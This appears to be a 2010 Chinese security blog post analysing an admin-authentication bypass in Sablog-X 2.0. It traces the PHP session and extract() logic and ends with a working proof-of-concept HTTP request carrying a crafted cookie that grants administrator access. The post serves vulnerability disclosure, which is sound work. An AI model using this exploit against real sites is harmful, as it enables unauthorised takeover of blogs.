Sablog-X 2.0 后台管理权限欺骗漏洞
2010年02月25日 |
作者:Ryat
前不久80vul公布了sax2.0的一个漏洞,随后4ngel发布了补丁,不过权限验证部分的代码还是存在问题,下面就来简单说说这个漏洞:D
|
1 2 3 4 5 6 7 8 9 10 |
// cp.php if (!$sax_uid || !$sax_pw || !$sax_logincount || !$sax_hash) { // 只要这个条件不满足,就可以通过后台的权限验证了 loginpage(); } ... if ($sax_group == 1) { // 如果要获得管理员权限,还必须保证$sax_group的值为1 ... |
下面来看下这几个变量是怎么来的
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
// common.inc.php list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', ''); // authcode()就是简单的调用base64_decode $sax_hash = sax_addslashes($_COOKIE['sax_hash']); // 这些变量来自$_COOKIE,是可以控制的:) // 不过后面的代码在一定条件下会通过extract($_EVO)来重新注册这些变量 $sax_uid = intval($sax_uid); $sax_pw = sax_addslashes($sax_pw); $sax_logincount = intval($sax_logincount); $sax_group = 4; // 默认的值为4,而我们需要的值是1 $_EVO = array(); // 这里是fix那个变量覆盖的漏洞:) $seccode = $sessionexists = 0; $userfields = 'u.userid AS sax_uid, u.username AS sax_user, u.password AS sax_pw, u.groupid AS sax_group, u.logincount AS sax_logincount, u.email as sax_email, u.url as sax_url, u.lastpost, u.lastip, u.lastvisit, u.lastactivity'; // 这里定义的字段包括sax_user、sax_pw、sax_group、sax_logincount,这些都是后台权限验证时要用到的 if ($sax_hash) { if ($sax_uid && $sax_pw) { // 流程[1] // 这里会查询sax_group,但如果我们想让查询出的值为1[也就是说查询出管理员的信息],就必须知道管理员的sax_hash、sax_pw、sax_logincount等多个值 $query = $DB->query("SELECT s.hash, s.seccode, $userfields FROM {$db_prefix}users u LEFT JOIN {$db_prefix}sessions s ON (s.uid = u.userid) WHERE s.hash='$sax_hash' AND u.userid='$sax_uid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND u.password='$sax_pw' AND u.logincount='$sax_logincount' AND s.auth_key='$sax_auth_key'"); } else { $query = $DB->query("SELECT hash,uid as sessionuid,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip' LIMIT 1"); // 流程[2] // 如果我们知道管理员的sax_hash和onlineip,就可以使下面的$_EVO['sessionuid']的值为管理员的id } if ($_EVO = $DB->fetch_array($query)){ $sessionexists = 1; if($_EVO['sessionuid']) { // 流程[3] $query = $DB->query("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='".intval($_EVO['sessionuid'])."'"); $_EVO = array_merge($_EVO, $DB->fetch_array($query)); // 这里查询的数据会合并到$_EVO,而我们只要能控制$_EVO['sessionuid']的值为1[假设我们要查询的管理员id为1],就可以查询出正确的管理员信息,这样就可以保证sax_group的值为1了 $sax_uid = $_EVO['userid']; } } else { if($_EVO = $DB->fetch_one_array("SELECT hash,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'")) { dcookies(); $sessionexists = 1; } } } ...... @extract($_EVO); |
由上面的代码可以看到,如果我们知道session表中uid为1的数据的sax_hash和onlineip,通过流程[2][3]就可以查询出正确的管理员信息,再通过extract($_EVO)注册变量,就可以通过后台的验证,获得管理员权限了:)
那么我们如何知道正确的sax_hash和onlineip呢?
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
// global.func.php function updatesession() { ... replacesession(1); ... } ... function replacesession($insert = 0) { ... $ips = explode('.', $onlineip); ... $DB->query("INSERT INTO {$db_prefix}sessions (hash, auth_key, ip1, ip2, ip3, ip4, uid, groupid, lastactivity, seccode, is_robot) VALUES ('$sax_hash', '$sax_auth_key', '$ips[0]', '$ips[1]', '$ips[2]', '$ips[3]', '$sax_uid', '$sax_group', '$timestamp', '$seccode', '".IS_ROBOT."')"); ... |
replacesession()函数为我们提供帮助,因为$sax_hash、$sax_uid、$onlineip这些变量是可以控制的,所以我们可以向session表中出入一条uid为1的数据:)
首 先我们使$sax_uid为1,$sax_pw为空,这样就会跳过流程[1]执行流程[2],这时我们的sax_hash和onlineip在 session表中并不存在,所以流程[3]不会执行,通过extract($_EVO)注册变量时也不会重新注册$sax_uid、$sax_hash 和$onlineip,这样我们就可以通过updatesession()函数向session表中插入一条uid为1同时sax_hash和 onlineip也是我们知道的数据了
然后我们重新执行上面的过程,因为这时session表里已经有了我们需要的数据了,流程[3]将被执 行,user表中uid为1的管理员数据将被查询出并合并到$_EVO,并通过extract()重新注册变量[$sax_group的值将被重新注册为 1],这样我们就可以通过后台权限验证,并获得管理员权限了:)
PoC:
|
1 2 3 4 |
GET /cp.php HTTP/1.1; Host: 127.0.0.1 Connection: Close Cookie: sax_auth=MQkJ;sax_hash=abcdef; |
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!